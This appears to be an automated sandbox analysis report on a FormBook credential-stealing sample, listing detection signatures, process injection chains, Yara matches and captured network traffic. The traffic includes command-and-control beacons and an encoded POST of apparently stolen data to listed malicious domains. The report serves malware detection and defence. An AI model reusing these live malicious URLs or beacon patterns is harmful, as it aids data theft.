Windows Analysis Report
Order No 24.exe

Overview

General Information

Sample name: Order No 24.exe
Analysis ID: 1557782
MD5: e785b831c8183b40f176d34c36e8ad3e
SHA1: 8927f85512b851604e1bb6a44e1e2124b8592381
SHA256: dab3c27ad67888d0202abfd11c7fc17d62d501dd611d6f46756bfefe246b06e5
Tags: exe, Formbook, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Order No 24.exe (PID: 4412 cmdline: "C:\Users\user\Desktop\Order No 24.exe" MD5: E785B831C8183B40F176D34C36E8AD3E)
    • svchost.exe (PID: 4256 cmdline: "C:\Users\user\Desktop\Order No 24.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • vqiDHNHvZuv.exe (PID: 2184 cmdline: "C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • net.exe (PID: 5544 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • vqiDHNHvZuv.exe (PID: 1468 cmdline: "C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 592 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.490000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.490000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Order No 24.exe", CommandLine: "C:\Users\user\Desktop\Order No 24.exe", CommandLine|base64offset|contains: 6, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Order No 24.exe", ParentImage: C:\Users\user\Desktop\Order No 24.exe, ParentProcessId: 4412, ParentProcessName: Order No 24.exe, ProcessCommandLine: "C:\Users\user\Desktop\Order No 24.exe", ProcessId: 4256, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Order No 24.exe", CommandLine: "C:\Users\user\Desktop\Order No 24.exe", CommandLine|base64offset|contains: 6, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Order No 24.exe", ParentImage: C:\Users\user\Desktop\Order No 24.exe, ParentProcessId: 4412, ParentProcessName: Order No 24.exe, ProcessCommandLine: "C:\Users\user\Desktop\Order No 24.exe", ProcessId: 4256, ProcessName: svchost.exe
                No Suricata rule has matched

                AV Detection

Source: http://www.4nk.education/gnvu/ | Avira URL Cloud: Label: malware
Source: http://www.4nk.education/gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSp | Avira URL Cloud: Label: malware
Source: http://www.migraine-massages.pro/ym43/?bdlD=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQscAddRW98P8tCbtJa8oLuk3yqY6cOAnXTMvRpBjAJYE68xAYSo=&92=DPyPNvf84fs0yXSp | Avira URL Cloud: Label: malware
Source: http://www.corpseflowerwatch.org/yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp | Avira URL Cloud: Label: malware
Source: http://www.migraine-massages.pro/ym43/ | Avira URL Cloud: Label: malware
Source: Order No 24.exe | ReversingLabs: Detection: 34%
Source: Yara match | File source: 2.2.svchost.exe.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.490000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4580363583.0000000005160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2301597898.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Order No 24.exe | Joe Sandbox ML: detected
Source: Order No 24.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2268680902.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2268784841.000000000083B000.00000004.00000020.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000002.4576582930.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vqiDHNHvZuv.exe, 00000003.00000000.2190711391.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4576813275.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: Order No 24.exe, 00000000.00000003.2139513122.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Order No 24.exe, 00000000.00000003.2129931817.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2176578979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2174584549.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2301147253.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.000000000307E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2308281410.0000000002D3A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Order No 24.exe, 00000000.00000003.2139513122.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Order No 24.exe, 00000000.00000003.2129931817.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2301205113.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2176578979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2174584549.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000003.2301147253.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.000000000307E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2308281410.0000000002D3A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000004.00000002.4576398296.0000000002952000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.000000000350C000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000000.2377314879.0000000002D2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2604417114.000000002CC4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000004.00000002.4576398296.0000000002952000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.000000000350C000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000000.2377314879.0000000002D2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2604417114.000000002CC4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2268680902.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2268784841.000000000083B000.00000004.00000020.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000002.4576582930.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009C6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_009C6CA9
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_009C60DD
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_009C63F9
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_009CEB60
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_009CF5FA
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009CF56F FindFirstFileW,FindClose, 0_2_009CF56F
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_009D1B2F
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_009D1C8A
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_009D1F94
Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003AC820 FindFirstFileW,FindNextFileW,FindClose, 4_2_003AC820
Source: C:\Windows\SysWOW64\net.exe | Code function: 4x nop then xor eax, eax | 4_2_00399D30
Source: C:\Windows\SysWOW64\net.exe | Code function: 4x nop then mov ebx, 00000004h | 4_2_02C704E8

                Networking

Source: DNS query: www.066bet.xyz
Source: Joe Sandbox View | IP Address: 47.52.221.8
Source: Joe Sandbox View | IP Address: 128.65.195.180
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_009D4EB5
Source: global traffic | HTTP traffic detected: GET /yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.corpseflowerwatch.org | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSp HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.4nk.education | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /ym43/?bdlD=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQscAddRW98P8tCbtJa8oLuk3yqY6cOAnXTMvRpBjAJYE68xAYSo=&92=DPyPNvf84fs0yXSp HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.migraine-massages.pro | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /afcr/?92=DPyPNvf84fs0yXSp&bdlD=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8BGuo8VlMLN9CkLyFlXp6E4p5ywSBzzNp8Wyc9RtRv/+r7WpQ+fc= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.pluribiz.life | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /1iqa/?bdlD=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgSz03N/ngXbpk/5Fwdw8cafADp2cf4RIz4iuPQDTbp2HaXJhBs8=&92=DPyPNvf84fs0yXSp HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.kdtzhb.top | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /293d/?92=DPyPNvf84fs0yXSp&bdlD=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQfJK7OXgC3z9Q8k+eyxfCNOxpUJEtAyvn1uDuMR9mQoL/1sf57M= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.evoo.website | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /vdvc/?bdlD=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfKoDXMQfKdBjdSZSECOlFudRAOmJhTFjNLDsmq1e7cQhZ206lWU=&92=DPyPNvf84fs0yXSp HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.astorg-group.info | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0m8a/?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.fiqsth.vip | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /ezyn/?bdlD=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKKN8Ow4Y4PJmf6bny7d6dDdcL0boa7lHYjswT0s5aRSMl4VpoSs=&92=DPyPNvf84fs0yXSp HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.bio-thymus.com | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /9ezc/?92=DPyPNvf84fs0yXSp&bdlD=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+OZM84GvKl89TQvRVoJIWPcM5zWijXmHfAArwoQ1tIQ9QsTkOWIA= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.wukong.college | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /95c0/?bdlD=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4XocmoyAxgZDXS9ILoL/richVPo7jE4Ugu66IHT+Zvw5gPpB1yeo=&92=DPyPNvf84fs0yXSp HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.vehiculargustav.click | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /fjsq/?bdlD=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSYA+LY6DfFhY+Crt0zWizEXMfJfu41KYaKDIGSHYliJNf2GNGmHE=&92=DPyPNvf84fs0yXSp HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.yushaliu.online | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /ucmb/?92=DPyPNvf84fs0yXSp&bdlD=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLzkLvWq29n5ve7+0lsSpjEyv7qUGv0unsJnIf6ZDw73FDzrF564s= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.marketprediction.app | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.corpseflowerwatch.org
Source: global traffic | DNS traffic detected: DNS query: www.4nk.education
Source: global traffic | DNS traffic detected: DNS query: www.migraine-massages.pro
Source: global traffic | DNS traffic detected: DNS query: www.vnxoso88.art
Source: global traffic | DNS traffic detected: DNS query: www.pluribiz.life
Source: global traffic | DNS traffic detected: DNS query: www.kdtzhb.top
Source: global traffic | DNS traffic detected: DNS query: www.evoo.website
Source: global traffic | DNS traffic detected: DNS query: www.astorg-group.info
Source: global traffic | DNS traffic detected: DNS query: www.fiqsth.vip
Source: global traffic | DNS traffic detected: DNS query: www.bio-thymus.com
Source: global traffic | DNS traffic detected: DNS query: www.wukong.college
Source: global traffic | DNS traffic detected: DNS query: www.vehiculargustav.click
Source: global traffic | DNS traffic detected: DNS query: www.bulls777.pro
Source: global traffic | DNS traffic detected: DNS query: www.yushaliu.online
Source: global traffic | DNS traffic detected: DNS query: www.marketprediction.app
Source: global traffic | DNS traffic detected: DNS query: www.066bet.xyz
                Source: unknownHTTP traffic detected: POST /gnvu/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 209Cache-Control: max-age=0Connection: closeHost: www.4nk.educationOrigin: http://www.4nk.educationReferer: http://www.4nk.education/gnvu/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36Data Raw: 62 64 6c 44 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 47 72 70 4f 49 47 72 70 39 6b 56 42 4e 48 35 32 79 68 52 4e 54 71 44 6c 61 52 50 43 71 4c 64 4d 58 6e 62 6f 4c 75 6f 57 37 55 4a Data Ascii: bdlD=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTGrpOIGrp9kVBNH52yhRNTqDlaRPCqLdMXnboLuoW7UJ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 15:26:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
